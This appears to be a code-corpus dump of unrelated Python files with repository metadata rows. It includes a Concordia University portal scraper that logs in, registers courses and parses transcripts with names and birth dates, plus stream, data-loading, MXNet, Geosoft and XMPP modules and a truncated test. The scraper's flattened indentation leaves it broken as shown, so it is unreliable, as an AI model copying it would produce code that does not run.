STUDENT_RECORD_URL = 'https://genesis.concordia.ca/Transcript/PortalStudentRecord.aspx?token=%s'
REGISTRATION_URL = 'https://regsis.concordia.ca/portalRegora/undergraduate/wr150.asp?token=%s'
REGISTER_FOR_COURSE_URL = 'https://regsis.concordia.ca/portalRegora/undergraduate/wr225.asp'
CONFIRM_REGISTER_FOR_COURSE_URL = 'https://regsis.concordia.ca/portalRegora/undergraduate/wr300.asp'
CHANGE_SECTION_URL = 'https://regsis.concordia.ca/portalRegora/undergraduate/wr500.asp'
ACADEMIC_LINK = 'Academic'
REGISTRATION_NETLOC = 'regsis.concordia.ca'
LOGIN_FAILURE_URL = 'https://my.concordia.ca/psp/portprod/?cmd=login&languageCd=ENG'
DEFAULT_HEADERS = [
('Host', 'my.concordia.ca'),
('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'),
('Accept-Encoding', 'gzip,deflate,sdch'),
('Accept-Language', 'en-GB,en;q=0.8,fr;q=0.6,en-US;q=0.4,fr-CA;q=0.2'),
('Origin', 'https://www.myconcordia.ca'),
('Referer', 'https://www.myconcordia.ca/'),
('User-Agent', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36')
]
def __init__(self):
self.cj = CookieJar()
self.opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cj))
self.opener.addheaders = [
('Host', 'my.concordia.ca:443'),
('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'),
('Accept-Encoding', 'gzip,deflate,sdch'),
('Accept-Language', 'en-GB,en;q=0.8,fr;q=0.6,en-US;q=0.4,fr-CA;q=0.2'),
('Origin', 'https://www.myconcordia.ca'),
('Referer', 'https://www.myconcordia.ca/'),
('User-Agent', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36')
]
self.site_tree = None
self.student_record = None
self.external_token = None
self.registration_id = None
self.currently_at = None
self.current_bs = None
def set_headers(self):
if self.currently_at:
parse = urlparse.urlparse(self.currently_at)
origin = parse[0] + '://' + parse[1]
self.opener.addheaders[0] = ('Host', parse[1])
self.opener.addheaders[4] = ('Origin', origin)
self.opener.addheaders[5] = ('Referer', self.currently_at)
def login(self, userid, password):
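        """POST the portal login form with the given credentials; returns True
        when a PS_TOKEN cookie is set (authentication succeeded), otherwise
        resets this accessor and returns False."""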
payload_data = {
'resource': '/content/cspace/en/login.html',
'_charset_': 'UTF-8',
'userid': userid,
'pwd': password
}
content = self.get_url(self.LOGIN_URL, payload_data)
if 'PS_TOKEN' in self.cj._cookies['.concordia.ca']['/']:
# we authenticated properly
self.site_tree = BeautifulSoup(content)
return True
else:
# we didn't authenticate properly, so we have to reset the object
self.__init__()
return False
def get_url(self, url, payload_data=None):
# Todo: make this more robust?
# Todo: also add an error condition for if an absolute URL is never supplied
if url[:4] != 'http':
url = urlparse.urljoin(self.currently_at, url)
self.set_headers()
if payload_data:
data = urllib.urlencode(payload_data)
response = self.opener.open(url, data)
else:
response = self.opener.open(url)
self.currently_at = response.geturl()
if response.info().get('Content-Encoding') == 'gzip':
return unzip(response.read())
else:
return response.read()
def set_token(self):
m = re.search(r'token=([a-zA-Z0-9]*)', self.currently_at)
if m.group(1):
self.external_token = m.group(1)
else:
raise Exception
def get_url_with_token(self, url, payload_data=None):
return self.get_url(url % self.external_token, payload_data)
def get_url_with_registration_id(self, url, payload_data={}):
payload_data['Id'] = self.registration_id
return self.get_url(url, payload_data)
def get_content(self, url, payload_data=None):
bs = BeautifulSoup(self.get_url(url, payload_data))
return BeautifulSoup(self.get_url(bs.find('frame', title='Main Content')['src']))
def navigate_content(self, url, payload_data=None):
return BeautifulSoup(self.get_url(url, payload_data))
def get_nav_link_by_name(self, link):
try:
return self.site_tree.find('a', attrs={'name': link})['href']
except TypeError:
return None
def get_nav_link_by_title(self, link):
try:
return self.site_tree.find('a', title=link)['href']
except TypeError:
return None
def get_content_link_by_title(self, content, link):
return content.find('a', title=link)['href']
def submit_form(self, content, form_id=None, extra_data=None, force_url=None):
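        """Collect the hidden <input> fields of the page (optionally scoped to
        the form with id form_id), merge in extra_data, and POST the payload to
        the form's action URL (or to force_url when given)."""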
payload = {}
if form_id:
form = content.find('form', id=form_id)
hiddens = form.find_all('input', type='hidden')
else:
hiddens = content.find_all('input', type='hidden')
for el in hiddens:
payload[el.attrs['name']] = el['value']
if extra_data:
for data in extra_data.iteritems():
payload[data[0]] = data[1]
if force_url:
url = force_url
else:
url = form['action']
return self.navigate_content(url, payload)
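    # Illustrative use of submit_form (hypothetical field/value, not from the
    # original source): re-post a PeopleSoft page's form with one extra field.
    # All hidden <input> values on the page are echoed back, which is what
    # these pages expect:
    #
    #   page = self.navigate_content(some_url)
    #   nxt = self.submit_form(page, form_id='form2',
    #                          extra_data={'Submit': 'Continue'})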
    def in_section(self, section):
        if section == 'registration':
            return self.netloc == self.REGISTRATION_NETLOC
        return False
@property
def netloc(self):
return urlparse.urlparse(self.currently_at)[1]
def get_student_record(self):
return ConcordiaStudentRecord(self.get_url_with_token(self.STUDENT_RECORD_URL))
# link = self.ACADEMIC_LINK
# content = self.get_content(self.get_nav_link_by_title(link))
# link = self.STUDENT_RECORD_LINK_TEXT
# self.student_record = self.get_content(self.get_content_link_by_title(content, link))
def goto_registration(self):
link = 'Registration'
content = self.get_content(self.get_nav_link_by_title(link))
link = 'Undergraduate Registration'
content = self.get_content(self.get_content_link_by_title(content, link))
content = self.navigate_content(content.meta['content'][6:])
form_id = 'form2' # Continue
self.current_bs = self.submit_form(content, form_id)
def get_registration_id(self):
content = BeautifulSoup(self.get_url(self.REGISTRATION_URL))
self.registration_id = content.find('input', type='hidden', attrs={'name': 'Id'})['value']
def register_for_course(self, section):
if not self.registration_id:
self.get_registration_id()
section_tree = section.section_tree_to_here
payload_data1 = {
'CourName': section.course.course_letters,
'CourNo': section.course.course_numbers,
'Sess': SEMESTER_REVERSE_MAPPER[section.semester_year.period],
'CatNum': '12345',
'MainSec': section_tree[0],
'RelSec1': '',
'RelSec2': '',
}
payload_data2 = {
'cournam': section.course.course_letters,
'courno': section.course.course_numbers,
'acyear': section.semester_year.year,
'session': SEMESTER_REVERSE_MAPPER[section.semester_year.period],
'mainsec': section_tree[0],
'relsec1': '',
'relsec2': '',
'subses': '',
'catalog': '12345',
}
if 1 in section_tree:
payload_data1['RelSec1'] = section_tree[1]
payload_data2['relsec1'] = section_tree[1]
        if 2 in section_tree:
            payload_data1['RelSec2'] = section_tree[2]
            payload_data2['relsec2'] = section_tree[2]
        # TODO: add check for confirmation?
        self.get_url_with_registration_id(self.REGISTER_FOR_COURSE_URL, payload_data1)
        return self.get_url_with_registration_id(self.CONFIRM_REGISTER_FOR_COURSE_URL, payload_data2)
def change_section(self, from_section, to_section):
from_section_tree = from_section.section_tree_to_here
to_section_tree = to_section.section_tree_to_here
payload_data = {
'cournam': to_section.course.course_letters,
'courno': to_section.course.course_numbers,
'acyear': to_section.semester_year.year,
'toSession': SEMESTER_REVERSE_MAPPER[to_section.semester_year.period],
'mainsec': to_section_tree[0],
'relsec1': '',
'relsec2': '',
'subses': '',
'catalog': '12345',
'fmainsec': from_section_tree[0],
'frelsec1': '',
'frelsec2': '',
'fSession': SEMESTER_REVERSE_MAPPER[from_section.semester_year.period],
'fsubses': '',
}
        # Check the from- and to-trees independently; the old code indexed
        # to_section_tree whenever from_section_tree had the key, which can
        # raise KeyError when the two sections have different shapes.
        if 1 in from_section_tree:
            payload_data['frelsec1'] = from_section_tree[1]
        if 1 in to_section_tree:
            payload_data['relsec1'] = to_section_tree[1]
        if 2 in from_section_tree:
            payload_data['frelsec2'] = from_section_tree[2]
        if 2 in to_section_tree:
            payload_data['relsec2'] = to_section_tree[2]
        return self.get_url_with_registration_id(self.CHANGE_SECTION_URL, payload_data)
    def add_course(self, sec_info):
        # Note: this method is unfinished in the original source -- the key
        # looked up on sec_info is missing and no request is ever sent.
        if not self.registration_id:
            self.get_registration_id()
        payload_data = {
            'CourName': sec_info['']
        }
def get_user_status(self):
# status_link = self.get_nav_link_by_name('CU_ADDISPLAY')
# content = self.get_content(status_link)
        # The joined URL below was computed but never used; the request goes
        # to the hard-coded status page instead.
        # url = urlparse.urljoin(self.currently_at.replace('psp', 'psc'),
        #                        'WEBLIB_CONCORD.CU_PUBLIC_INFO.FieldFormula.IScript_ADDisplay')
        content = BeautifulSoup(self.get_url('https://my.concordia.ca/psc/upprpr9/EMPLOYEE/EMPL/s/WEBLIB_CONCORD.CU_PUBLIC_INFO.FieldFormula.IScript_ADDisplay'))
        self.set_token()
        stud_access = content.find('li').get_text()
        return bool(re.match('Undergraduate/Graduate Student Access enabled',
                             stud_access))
def parse_registration_response(self, response):
soup = BeautifulSoup(response)
status = soup.find('table', class_='MAIN').find('td', bgcolor='#000080').font.b.string.strip()
        if status == 'Course Registration Denied':
            table = soup.find('table', border=0)
            return False, table
        # Any other status is treated as accepted; there is no error table.
        return True, None
class ConcordiaStudentRecord(object):
STUDENT_RECORD_REGEX = r'([A-Z]{4}) (\d{3}[A-Z]?) (\/\d) ([A-Z0-9]*) (.*) (\d\.\d\d) ([A-Z]*[-+]?)? ([A-Z]*) \(?(\d\.\d)?\)? (\d.\d\d)? (\d*) (\d\.\d\d)? (.*)'
def __init__(self, html):
self.html = html
self.soup = BeautifulSoup(html)
self.student = None
self.student_info = None
self.student_record = None
self.main_div = self.soup.find('div', id='SIMSPrintSection')
self.student_info_soup = self.main_div.table.tr.nextSibling
self.parse_student_info()
degree_req_bs = self.student_info_soup.nextSibling
self.degree_reqs = degree_req_bs.string
exemption_bs = degree_req_bs.nextSibling
self.exemptions = exemption_bs.string
table_of_takens_bs = exemption_bs.nextSibling.table
current_row = table_of_takens_bs.tr
while current_row:
current_text = current_row.get_text()
if 'ACADEMIC YEAR' in current_text:
# TODO: replace with regex
current_year = current_text[14:18]
elif 'SUMMER' in current_text or 'FALL-WINTER' in current_text:
# we can ignore it
pass
#self.current_semester = Semester.objects.get(year=current_year, period=Semester.SUMMER_1)
elif 'Grade/Notation/GPA' in current_text:
pass
else:
current_text = gen_string_from_current_row(current_row)
m = re.match(self.STUDENT_RECORD_REGEX, current_text)
if m:
course_letters = m.group(1)
course_numbers = m.group(2)
semester = m.group(3)
sem = Semester.objects.get(year=current_year, period=SEMESTER_MAPPER[semester])
sec_name = m.group(4)
course_name = m.group(5)
course_credits = m.group(6)
grade_received = m.group(7)
notation = m.group(8)
gpa_received = m.group(9)
class_avg = m.group(10)
class_size = m.group(11)
credits_received = m.group(12)
other = m.group(13)
course = Course.objects.get(course_letters=course_letters, course_numbers=course_numbers)
try:
sec = Section.objects.get(course=course, semester_year=sem, name=sec_name)
print "%s %s Section %s found" % (course_letters, course_numbers, sec_name)
except Section.DoesNotExist:
sec = Section(course=course, semester_year=sem, name=sec_name, sec_type=Section.LECTURE,
days='')
print "%s %s Section %s not found" % (course_letters, course_numbers, sec_name)
sec.save()
try:
rec_ent = StudentRecordEntry.objects.get(student_record=self.student_record, section=sec)
print "SRE %s %s Section %s found" % (course_letters, course_numbers, sec_name)
except StudentRecordEntry.DoesNotExist:
rec_ent = StudentRecordEntry(student_record=self.student_record, section=sec)
print "SRE %s %s Section %s not found" % (course_letters, course_numbers, sec_name)
if int(current_year) <= get_current_school_year() and gpa_received is not None:
rec_ent.state = StudentRecordEntry.COMPLETED
rec_ent.result_grade = gpa_received
else:
rec_ent.state = StudentRecordEntry.REGISTERED
rec_ent.save()
# print gen_string_from_current_row(current_row)
current_row = current_row.nextSibling
#return table_blah
def parse_student_info(self):
id_row = self.student_info_soup.table.tr
id_num = id_row.td.b.get_text()
name_row = id_row.nextSibling
first_name, last_name = name_row.td.get_text().split(u'\xa0')
next_row = name_row.nextSibling
next_row = next_row.nextSibling
date_of_birth_text, sex = next_row.td.nextSibling.get_text().split(u'\xa0')
import datetime
dob = datetime.datetime.strptime(date_of_birth_text, '%d/%m/%y').date()
self.student_info = {
'id': id_num,
'first_name': first_name,
'last_name': last_name,
'date_of_birth': dob,
'gender': sex.strip(),
}
self.student = Student.objects.get(student_identifier=id_num)
self.student_record = StudentRecord.objects.get(student=self.student)
def unzip(gzipped_data):
buf = StringIO(gzipped_data)
unzipped = gzip.GzipFile(fileobj=buf)
return unzipped.read()
def gen_string_from_current_row(row):
b = []
for a in row.contents:
if type(a) is Tag:
# this sub is dangerous.... keep an eye out.
to_append = re.sub('[ ]{2,10}', ' ', a.get_text().strip())
b.append(to_append)
#keeping this section just in case it's needed for other faculties
#else:
# if a.strip() != u'':
# c = 'durr %s' % a.strip().replace(' ', ' ')
# b.append(c)
return ' '.join(b)
def get_current_school_year():
from datetime import date
now = date.today()
if now.month < 5: # previous actual year = school year
return now.year - 1
# else return current year
return now.year | gpl-2.0 | 5,778,534,104,969,647,000 | 39.489362 | 163 | 0.574859 | false | 3.571509 | false | false | false |
daviesjamie/spout | spout/streams.py | 1 | 3869 | import abc
class Stream(object):
"""
Abstract implementation of a data stream.
"""
__metaclass__ = abc.ABCMeta
def for_each(self, operation, limit=0, verbose=False):
"""
Applies the given Operation to each item in the stream. The Operation executes on the
items in the stream in the order that they appear in the stream.
If the limit is supplied, then processing of the stream will stop after that many items
have been processed.
"""
if limit != 0:
count = 0
while self.has_next():
operation.perform(self.next())
count += 1
if verbose:
print count
if count >= limit:
break
else:
while self.has_next():
operation.perform(self.next())
def filter(self, predicate):
"""
Transforms the stream by only keeping items that match the supplied predicate.
"""
return FilterStream(self, predicate)
def map(self, function):
"""
Transforms the stream by applying the supplied function to each item in the stream,
thus creating a new stream.
"""
return MapStream(self, function)
@abc.abstractmethod
def has_next(self):
"""
Tests to see if there are any items left in the stream to consume.
"""
pass
@abc.abstractmethod
def next(self):
"""
Fetches the next item in the stream.
"""
pass
class FilterStream(Stream):
"""
A stream created by applying a filter (in the form of a Predicate) to another stream.
"""
def __init__(self, source, predicate):
self.source = source
self.predicate = predicate
self.obj = None
def has_next(self):
if self.obj is not None:
return True
while self.source.has_next() and self.obj is None:
self.obj = self.source.next()
if not self.predicate.test(self.obj):
self.obj = None
return self.obj is not None
def next(self):
if not self.has_next():
raise Exception("Iteration has no more elements")
to_return = self.obj
self.obj = None
return to_return
class MapStream(Stream):
"""
A stream created by applying a Function to the elements in another stream.
"""
def __init__(self, source, function):
self.source = source
self.function = function
def has_next(self):
return self.source.has_next()
def next(self):
return self.function.apply(self.source.next())
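
# --- illustrative example (not part of the original module) ------------------
# Minimal sketch of how the combinators above compose. _ListStream, _IsEven and
# _Double are hypothetical demo helpers; the Predicate/Function protocols they
# follow (test()/apply()) are assumed from how FilterStream and MapStream
# invoke them.
class _ListStream(Stream):
    def __init__(self, items):
        self._items = list(items)

    def has_next(self):
        return bool(self._items)

    def next(self):
        return self._items.pop(0)


def _demo_pipeline():
    class _IsEven(object):
        def test(self, x):
            return x % 2 == 0

    class _Double(object):
        def apply(self, x):
            return x * 2

    # Keep the even numbers, then double each one.
    s = _ListStream(range(6)).filter(_IsEven()).map(_Double())
    out = []
    while s.has_next():
        out.append(s.next())
    return out  # -> [0, 4, 8]
# ------------------------------------------------------------------------------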
class BufferedStream(Stream):
"""
Implementation of a Stream that uses a BufferedQueue as its internal buffer.
This class is designed for use with live data sources that may produce data faster than it
can be consumed, as the internal BufferedQueue will drop items that aren't consumed (i.e,
removed from the queue) fast enough.
"""
def __init__(self, buf):
self.buf = buf
self.connected = False
def register(self, item):
"""
Attempts to 'register' an item with the BufferedStream by offering it to the
BufferedQueue. Returns True if the item was successfully published to the stream, or False
if it wasn't.
"""
return self.buf.offer(item)
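    # Typical producer/consumer wiring (BufferedQueue comes from a companion
    # module; the names below are illustrative, not from this file):
    #
    #   stream = BufferedStream(BufferedQueue(64))
    #   stream.connect()
    #   stream.register(item)        # producer; returns False on a full drop
    #   while stream.has_next():     # consumer
    #       consume(stream.next())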
def connect(self):
"""
Opens the streaming connection to the data source (makes has_next() return True)
"""
self.connected = True
def disconnect(self):
"""
Closes the stream (by making has_next() return False)
"""
self.connected = False
def has_next(self):
return self.connected
def next(self):
return self.buf.take() | mit | 4,541,527,865,234,232,300 | 25.875 | 98 | 0.583872 | false | 4.600476 | false | false | false |
apoorva-sharma/deep-frame-interpolation | data_loader.py | 1 | 3243 | import numpy as np
from scipy import misc
import glob
from tensorflow.contrib.learn.python.learn.datasets import base
class DataSet(object):
    def __init__(self, images, labels):
        assert images.shape[0] == labels.shape[0], (
            'images.shape: %s labels.shape: %s' % (images.shape, labels.shape))
        self._images = images
        self._labels = labels
        self._num_examples = images.shape[0]
        self._epochs_completed = 0
        self._index_in_epoch = 0
@property
def images(self):
return self._images
@property
def labels(self):
return self._labels
@property
def num_examples(self):
return self._num_examples
@property
def epochs_completed(self):
return self._epochs_completed
def next_batch(self, batch_size):
"""Return the next `batch_size` examples from this data set."""
start = self._index_in_epoch
self._index_in_epoch += batch_size
if self._index_in_epoch > self._num_examples:
# Finished epoch
self._epochs_completed += 1
# Shuffle the data
perm = np.arange(self._num_examples)
np.random.shuffle(perm)
self._images = self._images[perm]
self._labels = self._labels[perm]
# Start next epoch
start = 0
self._index_in_epoch = batch_size
assert batch_size <= self._num_examples
end = self._index_in_epoch
return self._images[start:end], self._labels[start:end]
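
# Minimal sketch of an epoch loop over a DataSet (synthetic arrays, not the
# project's image data; _demo_next_batch is illustrative only). next_batch()
# reshuffles automatically whenever an epoch boundary is crossed, so the
# caller only needs to watch epochs_completed.
def _demo_next_batch():
    ds = DataSet(np.zeros((100, 8, 8, 6)), np.zeros((100, 8, 8, 3)))
    while ds.epochs_completed < 2:
        xs, ys = ds.next_batch(32)  # 32 paired input/target examples
    return ds.epochs_completed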
def read_data_set(downsample_factor=1):
image_paths = glob.glob("./IMG/*.png")
image_paths.sort()
# [print(i) for i in image_paths]
train_inputs = []
train_targets = []
# load data into train_inputs/targets
for i in range(len(image_paths)-2):
before_target = 255-np.array(misc.imread(image_paths[i]))
target = 255-np.array(misc.imread(image_paths[i+1]))
after_target = 255-np.array(misc.imread(image_paths[i+2]))
if downsample_factor > 1:
before_target = before_target[::downsample_factor,::downsample_factor,:];
target = target[::downsample_factor,::downsample_factor,:];
after_target = after_target[::downsample_factor,::downsample_factor,:];
x = np.concatenate((before_target,after_target),axis = 2)
train_inputs.append(x)
train_targets.append(target)
train_inputs = np.array(train_inputs)
train_targets = np.array(train_targets)
print(train_inputs.shape)
## split into train, test, validation
dataset_size = len(train_inputs)
test_size = int(0.15*(dataset_size))
validation_size = test_size
# shuffle data
perm = np.arange(dataset_size)
np.random.shuffle(perm)
train_inputs = train_inputs[perm]
train_targets = train_targets[perm]
# split
validation_inputs = train_inputs[-validation_size:]
validation_targets = train_targets[-validation_size:]
test_inputs = train_inputs[-(validation_size+test_size):-validation_size]
test_targets = train_targets[-(validation_size+test_size):-validation_size]
train_inputs = train_inputs[:-(validation_size+test_size)]
train_targets = train_targets[:-(validation_size+test_size)]
print('Train size:', train_inputs.shape)
print('Test size:', test_inputs.shape)
print('Validation size:', validation_inputs.shape)
# package as tf.Datasets object and return
train = DataSet(train_inputs, train_targets)
validation = DataSet(validation_inputs, validation_targets)
test = DataSet(test_inputs, test_targets)
return base.Datasets(train=train, validation=validation, test=test)
if __name__ == '__main__':
read_data_set()
| mit | 3,691,239,741,978,047,000 | 25.365854 | 76 | 0.708295 | false | 3.079772 | true | false | false |
leezu/mxnet | python/mxnet/gluon/probability/distributions/gamma.py | 5 | 3721 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# coding: utf-8
# pylint: disable=wildcard-import
"""Gamma Distribution."""
__all__ = ['Gamma']
from .exp_family import ExponentialFamily
from .constraint import Real, Positive
from .utils import getF, sample_n_shape_converter, gammaln, digamma
class Gamma(ExponentialFamily):
r"""Create a Gamma distribution object.
Parameters
----------
shape : Tensor or scalar
shape parameter of the distribution, often represented by `k` or `\alpha`
scale : Tensor or scalar, default 1
scale parameter of the distribution, often represented by `\theta`,
`\theta` = 1 / `\beta`, where `\beta` stands for the rate parameter.
F : mx.ndarray or mx.symbol.numpy._Symbol or None
Variable recording running mode, will be automatically
inferred from parameters if declared None.
"""
# pylint: disable=abstract-method
# TODO: Implement implicit reparameterization gradient for Gamma.
has_grad = False
support = Real()
arg_constraints = {'shape': Positive(), 'scale': Positive()}
def __init__(self, shape, scale=1.0, F=None, validate_args=None):
_F = F if F is not None else getF(shape, scale)
self.shape = shape
self.scale = scale
super(Gamma, self).__init__(
F=_F, event_dim=0, validate_args=validate_args)
def log_prob(self, value):
if self._validate_args:
self._validate_samples(value)
F = self.F
log_fn = F.np.log
lgamma = gammaln(F)
# alpha (concentration)
a = self.shape
# beta (rate)
b = 1 / self.scale
return a * log_fn(b) + (a - 1) * log_fn(value) - b * value - lgamma(a)
def broadcast_to(self, batch_shape):
new_instance = self.__new__(type(self))
F = self.F
new_instance.shape = F.np.broadcast_to(self.shape, batch_shape)
new_instance.scale = F.np.broadcast_to(self.scale, batch_shape)
super(Gamma, new_instance).__init__(F=F,
event_dim=self.event_dim,
validate_args=False)
new_instance._validate_args = self._validate_args
return new_instance
def sample(self, size=None):
return self.F.np.random.gamma(self.shape, 1, size) * self.scale
def sample_n(self, size=None):
return self.F.np.random.gamma(self.shape, 1, sample_n_shape_converter(size)) * self.scale
@property
def mean(self):
return self.shape * self.scale
@property
def variance(self):
return self.shape * (self.scale ** 2)
def entropy(self):
F = self.F
lgamma = gammaln(F)
dgamma = digamma(F)
return (self.shape + F.np.log(self.scale) + lgamma(self.shape) +
(1 - self.shape) * dgamma(self.shape))
@property
def _natural_params(self):
return (self.shape - 1, -1 / self.scale)
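
def _example_usage():
    """Minimal sketch, not part of the original API: construct a Gamma with
    k=2, theta=3 and inspect its moments. Assumes mxnet.numpy (`mxnet.np`)
    arrays; the helper name `_example_usage` is illustrative only."""
    from mxnet import np as _np  # local import keeps module import cheap
    g = Gamma(shape=_np.array([2.0]), scale=_np.array([3.0]))
    mean = g.mean          # k * theta = 6.0
    var = g.variance       # k * theta ** 2 = 18.0
    draws = g.sample(size=(4, 1))
    return mean, var, draws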
| apache-2.0 | -6,705,765,177,642,580,000 | 35.480392 | 97 | 0.633701 | false | 3.828189 | false | false | false |
GeosoftInc/gxpy | geosoft/gxapi/GXMAPL.py | 1 | 4787 | ### extends 'class_empty.py'
### block ClassImports
# NOTICE: Do not edit anything here, it is generated code
from . import gxapi_cy
from geosoft.gxapi import GXContext, float_ref, int_ref, str_ref
### endblock ClassImports
### block Header
# NOTICE: The code generator will not replace the code in this block
### endblock Header
### block ClassImplementation
# NOTICE: Do not edit anything here, it is generated code
class GXMAPL(gxapi_cy.WrapMAPL):
"""
GXMAPL class.
The `GXMAPL <geosoft.gxapi.GXMAPL>` class is the interface with the MAPPLOT program,
which reads a MAPPLOT control file and plots graphical
entities to a map. The `GXMAPL <geosoft.gxapi.GXMAPL>` object is created for a given
control file, then passed to the MAPPLOT program, along
with the target `GXMAP <geosoft.gxapi.GXMAP>` object on which to do the drawing
"""
def __init__(self, handle=0):
super(GXMAPL, self).__init__(GXContext._get_tls_geo(), handle)
@classmethod
def null(cls):
"""
A null (undefined) instance of `GXMAPL <geosoft.gxapi.GXMAPL>`
:returns: A null `GXMAPL <geosoft.gxapi.GXMAPL>`
:rtype: GXMAPL
"""
return GXMAPL()
def is_null(self):
"""
Check if this is a null (undefined) instance
:returns: True if this is a null (undefined) instance, False otherwise.
:rtype: bool
"""
return self._internal_handle() == 0
# Miscellaneous
@classmethod
def create(cls, name, ref_name, line):
"""
Create a `GXMAPL <geosoft.gxapi.GXMAPL>`.
:param name: `GXMAPL <geosoft.gxapi.GXMAPL>` file name
:param ref_name: Map base reference name
:param line: Start line number in file (0 is first)
:type name: str
:type ref_name: str
:type line: int
:returns: `GXMAPL <geosoft.gxapi.GXMAPL>`, aborts if creation fails
:rtype: GXMAPL
.. versionadded:: 5.0
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
**Note:** The default map groups will use the reference name with
"_Data" and "_Base" added. If no reference name is specified,
the name "`GXMAPL <geosoft.gxapi.GXMAPL>`" is used
"""
ret_val = gxapi_cy.WrapMAPL._create(GXContext._get_tls_geo(), name.encode(), ref_name.encode(), line)
return GXMAPL(ret_val)
@classmethod
def create_reg(cls, name, ref_name, line, reg):
"""
Create a `GXMAPL <geosoft.gxapi.GXMAPL>` with `GXREG <geosoft.gxapi.GXREG>`.
:param name: `GXMAPL <geosoft.gxapi.GXMAPL>` file name
:param ref_name: Map base reference name
:param line: Start line number in file (0 is first)
:type name: str
:type ref_name: str
:type line: int
:type reg: GXREG
:returns: `GXMAPL <geosoft.gxapi.GXMAPL>`, aborts if creation fails
:rtype: GXMAPL
.. versionadded:: 5.0
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
**Note:** The default map groups will use the reference name with
"_Data" and "_Base" added. If no reference name is specified,
the name "`GXMAPL <geosoft.gxapi.GXMAPL>`" is used
"""
ret_val = gxapi_cy.WrapMAPL._create_reg(GXContext._get_tls_geo(), name.encode(), ref_name.encode(), line, reg)
return GXMAPL(ret_val)
def process(self, map):
"""
Process a `GXMAPL <geosoft.gxapi.GXMAPL>`
:type map: GXMAP
.. versionadded:: 5.0
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
self._process(map)
def replace_string(self, var, repl):
"""
Adds a replacement string to a mapplot control file.
:param var: Variable
:param repl: Replacement
:type var: str
:type repl: str
.. versionadded:: 5.0
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
self._replace_string(var.encode(), repl.encode())
### endblock ClassImplementation
### block ClassExtend
# NOTICE: The code generator will not replace the code in this block
### endblock ClassExtend
### block Footer
# NOTICE: The code generator will not replace the code in this block
### endblock Footer | bsd-2-clause | 6,101,702,230,829,206,000 | 29.303797 | 135 | 0.608105 | false | 3.481455 | false | false | false |
isandlaTech/cohorte-demos | led/dump/led-demo-raspberry/cohorte/dist/cohorte-1.0.0-20141209.234423-41-python-distribution/repo/sleekxmpp/plugins/xep_0202/time.py | 8 | 3106 | """
SleekXMPP: The Sleek XMPP Library
Copyright (C) 2010 Nathanael C. Fritz
This file is part of SleekXMPP.
See the file LICENSE for copying permission.
"""
import logging
from sleekxmpp.stanza.iq import Iq
from sleekxmpp.xmlstream import register_stanza_plugin
from sleekxmpp.xmlstream.handler import Callback
from sleekxmpp.xmlstream.matcher import StanzaPath
from sleekxmpp.plugins import BasePlugin
from sleekxmpp.plugins import xep_0082
from sleekxmpp.plugins.xep_0202 import stanza
log = logging.getLogger(__name__)
class XEP_0202(BasePlugin):
"""
XEP-0202: Entity Time
"""
name = 'xep_0202'
description = 'XEP-0202: Entity Time'
dependencies = set(['xep_0030', 'xep_0082'])
stanza = stanza
default_config = {
#: As a default, respond to time requests with the
#: local time returned by XEP-0082. However, a
#: custom function can be supplied which accepts
#: the JID of the entity to query for the time.
'local_time': None,
'tz_offset': 0
}
def plugin_init(self):
"""Start the XEP-0203 plugin."""
if not self.local_time:
def default_local_time(jid):
return xep_0082.datetime(offset=self.tz_offset)
self.local_time = default_local_time
self.xmpp.register_handler(
Callback('Entity Time',
StanzaPath('iq/entity_time'),
self._handle_time_request))
register_stanza_plugin(Iq, stanza.EntityTime)
def plugin_end(self):
self.xmpp['xep_0030'].del_feature(feature='urn:xmpp:time')
self.xmpp.remove_handler('Entity Time')
def session_bind(self, jid):
self.xmpp['xep_0030'].add_feature('urn:xmpp:time')
def _handle_time_request(self, iq):
"""
Respond to a request for the local time.
The time is taken from self.local_time(), which may be replaced
during plugin configuration with a function that maps JIDs to
times.
Arguments:
iq -- The Iq time request stanza.
"""
iq.reply()
iq['entity_time']['time'] = self.local_time(iq['to'])
iq.send()
def get_entity_time(self, to, ifrom=None, **iqargs):
"""
Request the time from another entity.
Arguments:
to -- JID of the entity to query.
        ifrom -- Specify the sender's JID.
block -- If true, block and wait for the stanzas' reply.
timeout -- The time in seconds to block while waiting for
a reply. If None, then wait indefinitely.
callback -- Optional callback to execute when a reply is
received instead of blocking and waiting for
the reply.
"""
iq = self.xmpp.Iq()
iq['type'] = 'get'
iq['to'] = to
iq['from'] = ifrom
iq.enable('entity_time')
return iq.send(**iqargs)
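
def _example_request(xmpp_client):
    """Minimal sketch (hypothetical JID, not part of the plugin): ask another
    entity for its local time and handle the reply asynchronously."""
    def on_time(iq):
        print(iq['entity_time']['time'])
    return xmpp_client['xep_0202'].get_entity_time('juliet@capulet.lit',
                                                   callback=on_time)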
| apache-2.0 | 7,519,437,295,183,417,000 | 29.693878 | 71 | 0.577592 | false | 3.916772 | false | false | false |
pheanex/xpython | exercises/kindergarten-garden/kindergarten_garden_test.py | 1 | 1974 | import unittest
from kindergarten_garden import Garden
# Tests adapted from `problem-specifications//canonical-data.json` @ v1.0.0
class KindergartenGardenTests(unittest.TestCase):
def test_garden_with_single_student(self):
self.assertEqual(
